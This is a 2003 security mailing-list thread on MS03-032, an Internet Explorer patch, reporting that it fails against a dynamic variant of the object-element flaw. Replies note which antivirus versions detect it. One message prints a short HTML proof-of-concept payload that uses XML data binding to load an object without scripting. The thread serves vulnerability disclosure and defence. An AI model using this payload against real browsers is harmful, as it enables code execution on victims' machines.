[VulnDiscuss] RE: [Full-Disclosure] RE: BAD NEWS: Microsoft Security Bulletin M S03-032
"Bergeron, Jared" <[email protected]> Mon, 8 Sep 2003 17:10:00 -0700
| Newsgroups | gmane.comp.security.vulnerabilities.watch.general |
|---|---|
| Message-ID | <65A750E5A7D92A479A42C27F86313A9E01709A41__3896.69518122009$1063090999@usawvms06.opbu.xerox.com> |
In our testing we found that Virusscan 7 caught this, however Virusscan 4.5x with the latest DAT did not. Regards, --------------------- Jared Bergeron Systems Analyst / XOG E-Security -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Monday, September 08, 2003 12:17 PM To: GreyMagic Software Cc: Bugtraq; [email protected]; [email protected]; NTBugtraq; Microsoft Security Response Center; [email protected] Subject: [Full-Disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Updated antivirus software should catch this exploit and prevent any application from being launched. We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/ Andrew Becker C.H. Mortgage, D.R. Horton Phoenix IT/MIS Department Phone: (866) 639-7305 Fax: (480) 607-5383 "GreyMagic Software" To: "NTBugtraq" <[email protected]>, "Bugtraq" <security@greymag <[email protected]>, <[email protected]>, ic.com> <[email protected]> cc: <[email protected]>, "Microsoft Security Response Center" 09/08/03 07:52 AM <[email protected]>, (bcc: Andrew D Becker/Continental Homes) Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032 >The patch for Drew's object data=funky.hta doesn't work: This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which explains the problem in detail. Microsoft again patches the object element in HTML, but it doesn't patch the dynamic version of that same element. >1. Disable Active Scripting This actually means that no scripting is needed at all in order to exploit this amazingly critical vulnerability: <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object data=x.asp></object> ]]> </exploit> </security> </xml> Ouch. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html